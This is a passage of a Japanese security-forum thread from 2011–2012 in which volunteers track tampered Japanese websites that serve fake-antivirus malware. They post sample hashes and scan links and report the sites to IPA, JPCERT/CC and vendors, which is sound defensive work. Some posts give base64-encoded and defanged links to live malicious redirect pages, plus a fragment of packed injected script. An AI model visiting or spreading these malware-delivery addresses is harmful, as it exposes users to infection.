2011/09/25(日) 04:21:17.06サイトのアドレスの一部をワイルドカードと合わせてavastのサイトブロックに登録するだけで有効かな?
0836名無しさん@お腹いっぱい。
2011/09/25(日) 04:24:38.61すごいことになってますな
0837/名無しさん[1-30] ◆.htmlint.U
2011/09/25(日) 05:57:10.37まぁ、ここで出たのを初回として3回目のとこを管理者だめっぽいので>>832の時にIPAにつーほーすた。
>>828
ここが震源地だたぁーのね。
http://hatsukari.2ch.net/test/read.cgi/news/1316848525/
>>836
目が痛い。。。
0838/名無しさん[1-30] ◆.htmlint.U
2011/09/25(日) 07:06:26.95お疲れ様です。
鯖缶、上位鯖缶とかにつーほーしました。
茨城繋がりだたーのね。
0839八頭 ◆YAGApwSaEw
2011/09/25(日) 12:33:07.67IPA往きが一番いいけど・・・土日とか大丈夫なんだろうか?
>>1
>>5について、日本地域における性能・効果も加味して再検討をしてみた方がいいかも
http://hibari.2ch.net/test/read.cgi/sec/1314348991/7
いづれにしろ攻撃は止まないし、無差別で、拡散も速い
0840/名無しさん[1-30] ◆.htmlint.U
2011/09/25(日) 14:58:22.10鯖缶が茨城。。。
>>806と同じらしいスクリプトも
誰かが投げた分
http://www.virustotal.com/file-scan/report.html?id=8a354b3b17a4d753f6ed9e6c9f62898b60a4888b8f543eca6abc399199262de7-1312351077
漏れが投げたの
http://www.virustotal.com/file-scan/report.html?id=8a354b3b17a4d753f6ed9e6c9f62898b60a4888b8f543eca6abc399199262de7-1316904594
まぁ偶然だと思いますが。
関連性でいうと大学のアメフト、大学のラクロス、大学の薙刀のほーが感染経路的に分かりやすかったかも。
0841名無しさん@お腹いっぱい。
2011/09/25(日) 15:02:37.16>まぁ、ここで出たのを初回として3回目のとこを管理者だめっぽいので>>832の時にIPAにつーほーすた。
何を言っているのかわからない
「ここで出たのを初回として3回目のとこを管理者だめっぽいので」ってどういうこと?
0842/名無しさん[1-30] ◆.htmlint.U
2011/09/25(日) 15:06:49.51一度対応されてから、再改竄->再対応、再々改竄を確認したのがあったので。
0843名無しさん@お腹いっぱい。
2011/09/25(日) 15:14:12.030844/名無しさん[1-30] ◆.htmlint.U
2011/09/25(日) 15:22:25.010845八頭 ◆YAGApwSaEw
2011/09/25(日) 15:43:31.89なるほど>>6には無いけど
登録が東京でもピュアニックは茨●なんだね
関連性や着眼点はランダムであっても注視しておいた方が後学にはなるかも
Google セーフ ブラウジング診断は、追跡開始と同時に90日間の結果も教えてくれる
各自、地元放送局やラジオ局など気になるキーワードでざっと調べてみるといいよ
0846名無しさん@お腹いっぱい。
2011/09/25(日) 19:05:28.49http://www●ganbanyoku-tsubaki●jp/
ここって絶賛放置中でしたっけ
0848八頭 ◆YAGApwSaEw
2011/09/25(日) 19:34:31.640849/名無しさん[1-30] ◆.htmlint.U
2011/09/25(日) 20:50:54.06( ゚д゚)ビンゴー>>794
>>837,841-842
>>848
乙です。
0850名無しさん@お腹いっぱい。
2011/09/26(月) 00:08:29.40このサイト乗っ取られちゃってるんですかね?
グーグルのキャッシュだとゲーム関連のサイトのようですし。
0851名無しさん@お腹いっぱい。
2011/09/26(月) 00:36:58.77Server HackeD By TiGER M@TE
遊んでますねw
0852名無しさん@お腹いっぱい。
2011/09/28(水) 20:31:04.95怪しげなGenuineCheck.exeが開くと落ちて着ます
サイト開くのに必要なのか.....Winエミ梨で実行不能だけど
0853名無しさん@お腹いっぱい。
2011/10/07(金) 20:26:16.040854/名無しさん[1-30] ◆.htmlint.U
2011/10/07(金) 21:19:54.98JSUNPACK
1f8a23b66cec81cb6d0305139524e72e0a7ec842
0855/名無しさん[1-30] ◆.htmlint.U
2011/10/07(金) 21:20:50.16>>854は目の痛み
0856名無しさん@お腹いっぱい。
2011/10/07(金) 22:37:44.66リンク先のアダルトサイトからscandsk.exeが落ちてきた
…けどVMで実行しても何も起きず。
とりあえずavastに検体提出
0857/名無しさん[1-30] ◆.htmlint.U
2011/10/07(金) 22:51:12.36オツカレサマです。
&lr=lang_ja
日本語ページのある彼の国とこへメル
蒲公英は現在無い模様。。。
0858/名無しさん[1-30] ◆.htmlint.U
2011/10/07(金) 22:53:35.88お疲れ様です。
nu蹴られちゃってるっぽいので助かりまうす。
0859/名無しさん[1-30] ◆.htmlint.U
2011/10/07(金) 23:37:38.160860/名無しさん[1-30] ◆.htmlint.U
2011/10/07(金) 23:41:11.52FakeAVげと
http://www.virustotal.com/file-scan/report.html?id=1d2aab09516985ff529e5d05a4a496f8f4ac911f62713066906c117789dc0ed3-1317997276
0861名無しさん@お腹いっぱい。
2011/10/07(金) 23:44:09.950862/名無しさん[1-30] ◆.htmlint.U
2011/10/07(金) 23:49:18.57過去ログっぽかった。
あきたねる
0863名無しさん@お腹いっぱい。
2011/10/07(金) 23:50:48.47BitDefenderだけw
0864/名無しさん[1-30] ◆.htmlint.U
2011/10/08(土) 23:36:04.68>>860
別のアドレスに飛ばされるようになたー。ファイルは同じもの
0865名無しさん@お腹いっぱい。
2011/10/10(月) 10:18:34.31http://www●huihuahotel●com●cn/
evar●lflink●comがそうなのかな
0866名無しさん@お腹いっぱい。
2011/10/10(月) 11:20:10.160867/名無しさん[1-30] ◆.htmlint.U
2011/10/11(火) 01:10:09.00ノ
>>865
IPAとかにつーほー
>>866
IPAとかに丸投げしますた。。。おrz。。。。。。
0868/名無しさん[1-30] ◆.htmlint.U
2011/10/11(火) 03:28:14.51>>853
( ゚∀゚)アハハ八八ノヽノヽノヽノ \ / \/ \
だりかお願い
0869/名無しさん[1-30] ◆.htmlint.U
2011/10/11(火) 19:22:47.23やっと消えたお >>868,>>583
0871/名無しさん[1-30] ◆.htmlint.U
2011/10/12(水) 00:07:43.37ノ
悲しいお知らせ
折角10/43まで逝った>>860ですが…
http://www.virustotal.com/file-scan/report.html?id=7e3d271dd1883d44051abb2b0380248cb7dd58164b18bb34a15a4031a5ac37e5-1318345034
4/43のご新規になりますた。。。
0872名無しさん@お腹いっぱい。
2011/10/12(水) 01:07:08.43いつも乙です
時間のある時にでもまた検体調査に行ってくるかな・・・
0873/名無しさん[1-30] ◆.htmlint.U
2011/10/12(水) 22:35:11.70むゎたかわったぁ
http://www.virustotal.com/file-scan/report.html?id=1f4580667000cf8c8a2875f2520babd38c013c73e0ac5b5da2ee254438119239-1318425656
4/43
こりゃてーへんだ>ベンダー
0874名無しさん@お腹いっぱい。
2011/10/13(木) 00:15:16.81落ちてくる検体も変わったねぇ
http://www.virustotal.com/file-scan/report.html?id=740e94ee09dd9c14a0885e45435e78fb384928f4823f0a1a9115e9af83c3dfd4-1318432094
相変わらず何も起きないけど
0875/名無しさん[1-30] ◆.htmlint.U
2011/10/14(金) 21:49:53.94うrl
c41e3a4f7ce7de96783854658a1241c7-1318588576
ふぁいる
786d47110b92908dd5ced091bfea6046ddd8a87b0770abecfae61628b7199563-1318596141
JSUNPACK
f0091f107e0bd469a047c33d1f9c4c20c4d239d9
飛び先はまたころころ変わりそう。。。
0876/名無しさん[1-30] ◆.htmlint.U
2011/10/14(金) 22:06:57.326/43
>>874
exeお願いします。m(_ _)m
0877名無しさん@お腹いっぱい。
2011/10/15(土) 22:23:53.57すでにリンク先が変更に・・・毎日変更ですかorz
今回はWebページ型FakeAV付き
Jsunpack
928990f5a388f32839a21c81c23ee4f880d42693
Webページ
f958e91b6e19ecfb7d6fac4c94231b0abb7ad2bac31c692b9c87ff6027a8bacb-1318684027
2/ 42 (4.8%)
本体EXE
8065d71f793769d4d9cc1c341e2d038d95428e0aeeaf3702c9e31ff590921747-1318684037
12/ 43 (27.9%)
落ちてきたルートキット?(既出っぽい)
8fb7c5dc29ca514bc2987d270513c86a3084466b23213d224408c682b8171405-1318684489
25/ 43 (58.1%)
0878/名無しさん[1-30] ◆.htmlint.U
2011/10/16(日) 02:03:22.80お疲れ様です。
ぐぐったこれは関連するのかな?
ttp://www.threatexpert.com/report.aspx?md5=af0099681d9d24d1f887562e9d8c180a
0879名無しさん@お腹いっぱい。
2011/10/16(日) 03:50:20.54いつもお疲れ様です
MD5同じなので同じファイルっぽいですね
scandsk.exeが相変わらず何もしないのでAnubisで解析させてみた
http://anubis.iseclab.org/?action=result&task_id=1a146b96de71dc7d4d5f47216b74caffe&format=html#id285810
…鯖が死んでてマルウェアダウンロードに失敗してるのかな
0880/名無しさん[1-30] ◆.htmlint.U
2011/10/16(日) 04:26:40.61どもです。
またぐぐる。
http://www.sophos.com/en-us/threat-center/threat-analyses/viruses-and-spyware/Troj~FakeAV-EPV/detailed-analysis.aspx
http://about-threats.trendmicro.com/malware.aspx?language=jp&name=TROJ_FAKEAV.GAC
301でbingに飛ばしてるとこはまだ死んでないっぽい?
aHR0cDovL21lZ2Fsb2Rvbi5qcC8yMDExLTEwMTYtMDQyNC0wNi93d3cuZGFuLmNvLnVrL3ZpZXdz
b3VyY2UvaW5kZXgucGhwP3VybD1odHRwJTNBJTJGJTJGOTguMTQyLjI0My42NCUyRmNocm9tZSUy
RnJlcG9ydC5odG1sJTNGNTU1NTV3NSUzRCU1RCVFRiVCRiVCRCVFRiVCRiVCRGNrJUVGJUJGJUJE
Y2dqZCVFRiVCRiVCRGolRUYlQkYlQkRqbW5oZSVEOCU5OSVFRiVCRiVCRG4lRUYlQkYlQkQlRUYl
QkYlQkQlRUYlQkYlQkQlRUYlQkYlQkRnJUVGJUJGJUJEZGtfamslNUIlRUYlQkYlQkQlRUYlQkYl
QkRyJUVGJUJGJUJEJUVEJThEJTg5JTVFJUVGJUJGJUJEJUVGJUJGJUJEJUVGJUJGJUJEb2Nna2RU
JUVGJUJGJUJEJUVGJUJGJUJEJUVGJUJGJUJEciVFRiVCRiVCRCVFRiVCRiVCRGIlQ0MlODhfJUVG
JUJGJUJEJUVGJUJGJUJEJUVGJUJGJUJEcWdveHVkZ3lramhnaHolRUYlQkYlQkR6a3phZXdoYmN2
Y2Nsamlmd2YlNUIlRTklOUElQUN1X2FkYiU1RWRkYyU1RWZkZmVlZWUlRUYlQkYlQkRlaWpUJUVG
JUJGJUJEcWIlNUViZGNfZmhZ
EXE
16d9696f4a32bcd571c5c55ac5e4fcb9cc3348ac7ec936ad6c46c447e63d626b-1318780277
Webページ
ab0e74102c941cff75b0ee3469c95a41484d29043d17f874a5faa5f14665805d-1318781102
VMだから偽アンチウイルスが発動しないのか、日本IPは弾かれてるのか…
往時の8080は鯖さえ生きてればお構いなく発動したもんですが
0882/名無しさん[1-30] ◆.htmlint.U
2011/10/20(木) 00:28:28.01JSUNPACK
d127c4dba13422aaba02157e6e0111c09d91401f
0883名無しさん@お腹いっぱい。
2011/10/23(日) 23:48:57.870884名無しさん@お腹いっぱい。
2011/10/24(月) 03:23:51.31http://www.google.co.jp/search?q=site:www.bookoff.co.jp+%E6%94%B9%E3%81%96%E3%82%93
子会社含めて今度で4回目って酷いな
HP管理委託業者の名前を晒してほしい
0885名無しさん@お腹いっぱい。
2011/10/24(月) 14:19:03.270886名無しさん@お腹いっぱい。
2011/10/26(水) 08:44:21.65gredでフィッシングサイト判定になっていて改ざんされてるっぽい
0887名無しさん@お腹いっぱい。
2011/10/26(水) 18:50:47.74大規模なASP.NET攻撃によりWebサイトが訪問者を攻撃
http://scan.netsecurity.ne.jp/archives/52024460.html
0888名無しさん@お腹いっぱい。
2011/10/26(水) 19:59:01.740889/名無しさん[1-30] ◆.htmlint.U
2011/10/27(木) 09:18:12.73侵略されちゃってますね
0890/名無しさん[1-30] ◆.htmlint.U
2011/10/27(木) 10:41:08.45投稿フォームからのスパムっぽい
とりあえずスパムの削除依頼してみた>ばりゅどめ
0891名無しさん@お腹いっぱい。
2011/10/27(木) 19:37:13.76ご対応感謝するでゲソ!
0892/名無しさん[1-30] ◆.htmlint.U
2011/11/08(火) 03:38:49.360893名無しさん@お腹いっぱい。
2011/11/08(火) 12:35:42.540894名無しさん@お腹いっぱい。
2011/11/08(火) 14:52:31.07IPアドレスが一時的に変わってた
代替サーバにしてメンテナンスしてたのかも
0895/名無しさん[1-30] ◆.htmlint.U
2011/11/08(火) 20:42:12.850896名無しさん@お腹いっぱい。
2011/11/11(金) 13:51:12.500897名無しさん@お腹いっぱい。
2011/11/22(火) 12:31:57.71http://www.seculead.jp/tokushu/gumblar.html
http://30tx.com/ ツイッターで宣伝中 http://goo.gl/sNq5y+
公式で堂々とやらないのが-100点
0898名無しさん@お腹いっぱい。
2011/11/25(金) 19:45:49.36Gumblar.xは2010年11月以降動かず止まったまま
htaccessリダイレクトは偽ウイルス対策ソフトの感染キャンペーン
Wordpressのtimthumb.phpの脆弱性でだいぶ攻撃がお盛ん (´A`;
ttp://www.google.co.jp/search?q=%22Fatal+error:+Cannot+redeclare+_765258526%22&hl=ja&lr=lang_ja&num=100
0899/名無しさん[1-30] ◆.htmlint.U
2011/11/25(金) 21:37:39.75ぅゎゎ
調子悪いので保留。。。orz.....
0900/名無しさん[1-30] ◆.htmlint.U
2011/11/25(金) 21:48:01.90JSUNPACK
899a47a3cb97a613973f7721405b58670ee8a5ad
飛び先は404っぽい
0901/名無しさん[1-30] ◆.htmlint.U
2011/11/25(金) 21:50:35.94>>900はなかったことに。。。
0902/名無しさん[1-30] ◆.htmlint.U
2011/11/25(金) 21:53:40.020903/名無しさん[1-30] ◆.htmlint.U
2011/11/25(金) 22:08:28.50いろいろあるみたい
ttp://www.google.com/safebrowsing/diagnostic?site=osa.pl
ttp://www.siteadvisor.com/sites/osa.pl/msgpage
ttp://safeweb.norton.com/report/show?url=osa.pl
0904/名無しさん[1-30] ◆.htmlint.U
2011/11/25(金) 22:52:35.63aHR0cDovL21lZ2Fsb2Rvbi5qcC8yMDExLTExMjUtMjIzOC0wNy9yZC5vci50bC9nZXQucGhwP3Np
dGU9aHR0cCUzQSUyRiUyRm1lc3Npbm9oZXlhJTJFaW5mbyUyRmF1dGhvciUyRmFkbWluJmFjdD12
aWV3
二回目以降のアクセスはスクリプトが消える仕様?
aHR0cDovL21lZ2Fsb2Rvbi5qcC8yMDExLTExMjUtMjI0OC0yMS9yZC5vci50bC9nZXQucGhwP3Np
dGU9aHR0cCUzQSUyRiUyRm1lc3Npbm9oZXlhJTJFaW5mbyUyRmF1dGhvciUyRmFkbWluJmFjdD12
aWV3DQpodHRwOi8vbWVnYWxvZG9uLmpwLzIwMTEtMTEyNS0yMjMyLTQ3L3d3dy5kYW4uY28udWsv
dmlld3NvdXJjZS9pbmRleC5waHA/dXJsPWh0dHAlM0ElMkYlMkZtZXNzaW5vaGV5YSUyRWluZm8l
MkZhdXRob3IlMkZhZG1pbg==
>>900で見つけたはずなのに、わからなくなったので>>901
0905/名無しさん[1-30] ◆.htmlint.U
2011/11/25(金) 23:04:09.53こりか
http://www.jpcert.or.jp/wr/2011/wr113001.html#3
0906/名無しさん[1-30] ◆.htmlint.U
2011/11/26(土) 00:25:48.47http://www.virustotal.com/file-scan/report.html?id=a08fca5de60440093999018312d12c97e3927b5f2af75348633d264748852d33-1322234054
0907名無しさん@お腹いっぱい。
2011/11/26(土) 00:26:18.870908名無しさん@お腹いっぱい。
2011/11/30(水) 16:19:43.20http://www.yomiuri.co.jp/national/news/20111129-OYT1T01327.htm
労災などの業務管理を行う厚生労働省の情報システムのサーバーが、ウイルス対策ソフトを装ったコンピューターウイルス
に感染し、同システムにつながる全国約1万台のパソコンが点検のため、今月25日からインターネットに接続できなくな
っていることが、わかった。情報流出は確認されていない。ウイルスは無差別に感染するタイプとみられ、同省が復旧を急
いでいる。
同省によると、感染したのは、労災の申請や認定、支給などの処理を行う情報システム。今月25日、福岡労働局の職員が
業務中に企業のホームページを閲覧中、パソコンが勝手にウイルス検索を始めるなどしたため、不審に思った職員が申し出
て感染が判明した。
ウイルス対策会社によると、このウイルスはネット上で仕込まれたページを開いただけで感染するタイプで、ウイルス対策
ソフトを装ってクレジットカード情報などを要求。2年ほど前から国内でも感染が増加しているという。
▽読売新聞(2011年11月30日03時09分)
0909名無しさん@お腹いっぱい。
2011/11/30(水) 18:41:10.73わざと流出させている恐れもある
0910名無しさん@お腹いっぱい。
2011/12/03(土) 17:41:46.77そこで対処されたCVE-2011-3544の攻撃処理がBlackholeに積まれたぞい ヽ(;´Д`)ノ
ttps://www-304.ibm.com/connections/blogs/tokyo-soc/entry/dbyd_20111031
0911名無しさん@お腹いっぱい。
2011/12/04(日) 21:57:18.29Googleでは「このサイトはコンピュータに損害を与える可能性があります。」になってる
0912/名無しさん[1-30] ◆.htmlint.U
2011/12/05(月) 01:18:47.19見てる途中でメンテになったお
ここ見てるのかな?
0913名無しさん@お腹いっぱい。
2011/12/05(月) 02:01:48.900914/名無しさん[1-30] ◆.htmlint.U
2011/12/05(月) 02:26:39.36とりあえずそれっぽいのはげとしたかも
飛び先は404っぽい
JS(ry
8674564d35fb2e06f5ec059b6bfded1b26c048ea
V(ry
9f065297b0fa42157b748f285347a1d3a8401d3e9c58dee686fd82392b169abc
IPAとJPCERT/CC、ベンダーいくつかにトス
0915/名無しさん[1-30] ◆.htmlint.U
2011/12/05(月) 02:46:59.99なんか早いぽ。
0916/名無しさん[1-30] ◆.htmlint.U
2011/12/07(水) 02:27:32.21あびら対応予定
JS/IFrame.aba
0917名無しさん@お腹いっぱい。
2011/12/10(土) 00:17:15.090918/名無しさん[1-30] ◆.htmlint.U
2011/12/10(土) 01:10:36.980919/名無しさん[1-30] ◆.htmlint.U
2011/12/10(土) 03:31:05.12お疲れ様です。
上流にメルしまひた。
なつかしの8080とかぱっとみでみっつスクリプトの内ふたつは検出率が低かったのでベンダーにトスしやした。
かすぺの自動応答にスパム扱いされちゃいました。
踏み台になってたかもん
0920名無しさん@お腹いっぱい。
2011/12/14(水) 00:56:42.73ttp://www.square-enix.com/jp/members/info/mainte.html
これの詳細わかる人居ますかね?
検体拾いたいんだけどGoogleキャッシュにも残ってねぇ
0921名無しさん@お腹いっぱい。
2011/12/14(水) 11:44:13.45http://www.google.com/safebrowsing/diagnostic?site=google.com/
http://megalodon.jp/2011-1214-1138-36/bit.ly/uwD8pu
tp://www.google.com/safebrowsing/diagnostic?site=http://initial-m●net/
0922名無しさん@お腹いっぱい。
2011/12/14(水) 23:52:45.36詳細わからんのでなんともいえんけど
クライアントへの攻撃スクリプトが仕込まれたわけじゃなくて
どっかの入力フォームからサーバーが攻撃されたってだけかもよ
0923名無しさん@お腹いっぱい。
2011/12/15(木) 00:04:10.70期間短いと探せないかもな
0924名無しさん@お腹いっぱい。
2011/12/15(木) 03:41:22.48NEVERのキャッシュ
0925名無しさん@お腹いっぱい。
2011/12/15(木) 06:16:29.380926八頭 ◆YAGApwSaEw
2011/12/23(金) 22:26:04.73allgov.com/Unusual_News/ViewNews/
Last_Man_Still_Living_in_Japans_Nuclear_Exclusion_Zone_111223
Aviraに反応のあったサイト
シマとグレッドには伝えておきました。
各自念の為伝達よろしくお願いします。(ちなみに。。。海外の福島関連の記事です)
avira.com解説
http://www.avira.com/ja/support-threats-summary-product/tid/4486/threat/HTML%252FPicFrame.Gen/track/1
※ヒューリスティック特別な検出
0927名無しさん@お腹いっぱい。
2011/12/25(日) 15:35:32.98これは誤検知、というか実害がない
CAPTCHA用の画像ファイル内部にHTMLタグが誤って挿入されてしまってるだけ
0928名無しさん@お腹いっぱい。
2012/01/03(火) 01:50:45.34www●hototogisu-kun●com/
↓
<script type='text/javascript'>eval(function(p,a,c,k,e,d・・
("p") か
("o") い
("q") ざ
("r") ん
0929/名無しさん[1-30] ◆.htmlint.U
2012/01/03(火) 09:54:24.30>>928
見てる間にコード消されたっぽい
0930/名無しさん[1-30] ◆.htmlint.U
2012/01/03(火) 10:00:08.92636292fe671d98d993c0a8af701627c4750e1003
飛び先は404っぽい
0931/名無しさん[1-30] ◆.htmlint.U
2012/01/03(火) 21:41:21.64消したんじゃなかったのか?>928
0932/名無しさん[1-30] ◆.htmlint.U
2012/01/03(火) 21:52:50.30JSUNPACK
5f2bcf2b562358f2fd82d6b470c6e3a3e4ec3b53
0933/名無しさん[1-30] ◆.htmlint.U
2012/01/04(水) 14:42:13.43ttp://www.virustotal.com/url-scan/report.html?id=d69fe84155629544a223c63c8a1beb07-1325650248
ttp://www.virustotal.com/file-scan/report.html?id=2a0a8a5f35979c12f5b8eb17609b1f637a971d1121a36332efe93cfd79f04d0e-1325653858
0934名無しさん@お腹いっぱい。
2012/01/09(月) 02:46:11.52Dan's View Sourceの魚拓
backupurl●com/31luot
0935八頭 ◆YAGApwSaEw
2012/01/12(木) 22:16:23.00時々、最新情報をチェックしてみて下さい。。。
改ざん - Google ニュース検索 (*日付順 )
http://goo.gl/9bsMb
サイバー攻撃 - Google ニュース検索 (*日付順 )
http://goo.gl/N7GCO
0936名無しさん@お腹いっぱい。
2012/01/12(木) 22:45:21.100937名無しさん@お腹いっぱい。
2012/01/13(金) 11:47:16.24Max32MBまでになってるし。
あとは落ちている事が少なくなればいいなぁ。
0938名無しさん@お腹いっぱい。
2012/01/15(日) 09:39:52.74んー
久しぶりに検体が落ちてきた
順次virustotalに上げてみる
https://www.virustotal.com/file/821fefc831fb4eca89e8a0d6b2d604fcde97c8c934416c28481ff3cfb95d9702/analysis/1326598630/
https://www.virustotal.com/file/53f295dfb1870f49c3e7842dfb5f22ce1d5f26e91b23c1740a0e48769000ce8c/analysis/1326598647/
https://www.virustotal.com/file/2340ee44273d0b1416ba723a0d2137e7ff113b934f691078894a99925d35eab3/analysis/1326598876/
https://www.virustotal.com/file/461ecf664395d720203d606ed6c018fd12eafa70e7b40ec6f11521cb76f296e2/analysis/1326598888/
https://www.virustotal.com/file/a4c4e6cb3325d9333bc14659b1bca8dcfcc346d9f60a17965cbe43a8629fa8b7/analysis/1326598903/
https://www.virustotal.com/file/38bb78b363bc739299b7c033a7e3b2f8f06509af3d92903751b32730879997f6/analysis/1326599366/
https://www.virustotal.com/file/22409beb91faa25e256d314113294afc3efdb5b0e90d1fc2e676cb6e62f5434e/analysis/1326600198/
大半はすでに対応済みのようで
画面上は変化なし、プロセスが複数常駐で何かインターネットに送信中
bot系かな
0941八頭 ◆YAGApwSaEw
2012/01/17(火) 00:57:57.16つホレ
■Know URL - 短縮URLを展開チェック
http://knowurl.com/
■GetLinkInfo - 短縮URLを展開チェック
http://www.getlinkinfo.com/
0942名無しさん@お腹いっぱい。
2012/01/17(火) 01:20:18.40めんどい
0943名無しさん@お腹いっぱい。
2012/01/17(火) 07:30:21.49http://scan.netsecurity.ne.jp/article/2012/01/13/28107.html
0944名無しさん@お腹いっぱい。
2012/01/17(火) 11:28:26.31ttp://lhsp.s206.xrea.com/misc/virusscan.html#crimescan
0945八頭 ◆YAGApwSaEw
2012/01/22(日) 19:27:47.82http://kohada.2ch.net/test/read.cgi/sec/1323593004/79
5箇所ほど貼られてるようだけど
これ何?IPはベナン。。。
http://www
-mediafire-com-wmi9t7s3zu9z251.tk/
0946八頭 ◆YAGApwSaEw
2012/01/22(日) 19:38:16.47virustotal.comではUNRATEDが3件
0947名無しさん@お腹いっぱい。
2012/01/25(水) 16:39:49.640948名無しさん@お腹いっぱい。
2012/01/25(水) 17:20:15.970949名無しさん@お腹いっぱい。
2012/01/25(水) 18:02:09.96なんたらかんたら.osa.pl/showthread.php?t=なんたらかんたら
0951名無しさん@お腹いっぱい。
2012/02/04(土) 15:22:48.91んー
0952名無しさん@お腹いっぱい。
2012/02/05(日) 23:53:48.180953名無しさん@お腹いっぱい。
2012/02/16(木) 00:40:26.330954名無しさん@お腹いっぱい。
2012/02/29(水) 17:14:05.52;;::: ::: :: : : /|:: ┌──────┐ ::| / ピロン♪ピロン♪ : ::: :::: :;::;
;;::: ::: : : . . |:: | .| ::| 緊急ぬるぽ速報です : :: : ::: ::;:;
;;: :: :;;: :: : |:: 緊急ぬるぽ速報 ..::| 強いぬるぽに警戒してください
;;: :: : ;;: :: : .. |::..| ..| ::| \ : :: :: ::; :: ;
;;: :: : ;;: :: : .. |::..└──────┘::| : :: :: ::; :: ; : :: :: ::; :: ;: :: :: ::: :: :: ; :: ;
;: : ;;: :: : ... |:: ┌────┐ | : :: :: ::; :: ; : ; : :; : :: :: :: :: :: :::; :: ;
|| ドサッ  ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ //∧_∧
☆ __  ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄(((゙゚'ω゚'))) うぁぁぁ
ヽ/\_\ ゴン [#]:: ::[#] と_ ヽ ヽ
\/__/ ⌒) | ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄| _)))
⊂⌒((;‐ω‐))  ̄| ̄| ̄ ̄ ̄ ̄ ̄ ̄| ̄| ̄ ~}
0955名無しさん@お腹いっぱい。
2012/03/07(水) 13:43:40.07http://www.itmedia.co.jp/enterprise/articles/1203/06/news048.html
0956名無しさん@お腹いっぱい。
2012/03/11(日) 19:14:10.27hjfghj.com/r.php ttp://www.google.co.jp/search?q=%22http:%2F%2Fhjfghj.com%2Fr.php%22
fgthyj.com/r.php ttp://www.google.co.jp/search?q=%22http:%2F%2Ffgthyj.com%2Fr.php%22
0957名無しさん@お腹いっぱい。
2012/03/13(火) 14:42:59.670958名無しさん@お腹いっぱい。
2012/03/13(火) 17:49:21.740959名無しさん@お腹いっぱい。
2012/03/26(月) 20:27:44.460960名無しさん@お腹いっぱい。
2012/05/10(木) 23:39:30.050961名無しさん@お腹いっぱい。
2012/05/12(土) 00:31:49.370962名無しさん@お腹いっぱい。
2012/05/22(火) 22:09:11.580963名無しさん@お腹いっぱい。
2012/05/23(水) 14:47:43.882001年作成のスレがごろごろあるセキュ板で保守など必要ない
0964名無しさん@お腹いっぱい。
2012/05/27(日) 10:41:56.94それ以外・・・すなわち、@Panda AAVG BALYac CJUST DKing EComodo FMSE
このあたりのフリーソフトでどれにするか迷っているなら、絶対にFMSEにすべきだね
日々ありとあらゆる感染実験をし、世界のクラッカーコミュを渡り歩き
英文でさまざまな解決策論文を発表し、痴餌袋等でも迷える子羊たちにバンバン指南し解決に導いている
FakeAVの研究では世界をリードしているプロの俺様がいうのだから間違いない( ー`дー´)キリッ
0965名無しさん@お腹いっぱい。
2012/05/30(水) 20:49:36.250966/名無しさん[1-30] ◆.htmlint.U
2012/06/07(木) 03:23:04.12こちらの環境では到達できにゃー
件名 : POST/EDIT/DELETE : "Local News in Astoria Journal " (rvs)
d9378c84f32ddc157bdbe1b59790fa084485e4d2
0967/名無しさん[1-30] ◆.htmlint.U
2012/07/04(水) 02:05:50.670968名無しより愛をこめて
2012/07/04(水) 03:32:34.570969名無しさん@お腹いっぱい。
2012/07/14(土) 09:05:25.250970名無しさん@お腹いっぱい。
2012/07/14(土) 18:50:45.14ニュースでやってたね。
具体的なウイルスの種類は言わなかったけど。
0971名無しさん@お腹いっぱい。
2012/07/14(土) 19:03:41.94http://hayabusa3.2ch.net/test/read.cgi/news/1342251052/
0972名無しさん@お腹いっぱい。
2012/07/26(木) 07:40:28.99http://www●matsue-yado●com/
0973名無しさん@お腹いっぱい。
2012/07/27(金) 11:35:22.05修正済みっぽい
めも
c3284d
km0ae9gr6m
0974名無しさん@お腹いっぱい。
2012/07/28(土) 11:52:50.69http://www●aqua-refine●com/
0975名無しさん@お腹いっぱい。
2012/07/29(日) 01:55:23.540976名無しさん@お腹いっぱい。
2012/07/29(日) 11:29:47.490977名無しさん@お腹いっぱい。
2012/08/06(月) 15:32:47.66↑のスレにてGENOの亜種に感染の報告有り。
0978純米どうふ ◆17FEKg9vOPOD
2012/08/06(月) 23:01:32.37お疲れ様です。
Aviraから「JS/Luyeb.A」で対応予定と回答が来ました。
KasperskyとMicrosoftは回答待ちです。
JPCERT/CCには報告済みです。
0979名無しさん@お腹いっぱい。
2012/08/10(金) 00:50:05.37対応ありがとうございます。
現在当該サイトは閉鎖しています。
0980純米どうふ ◆17FEKg9vOPOD
2012/08/10(金) 13:16:24.74KasperskyとAviraに検体提出。
JPCERT/CCには報告済みです。
0981純米どうふ ◆17FEKg9vOPOD
2012/08/10(金) 16:54:43.80ノシ
>>980
結果が返ってきました。
Kaspersky「Trojan.JS.Agent.byo」
Avira「JS/Obfuscated.CR」
0982名無しさん@お腹いっぱい。
2012/08/10(金) 17:22:27.20レス数が950を超えています。1000を超えると書き込みができなくなります。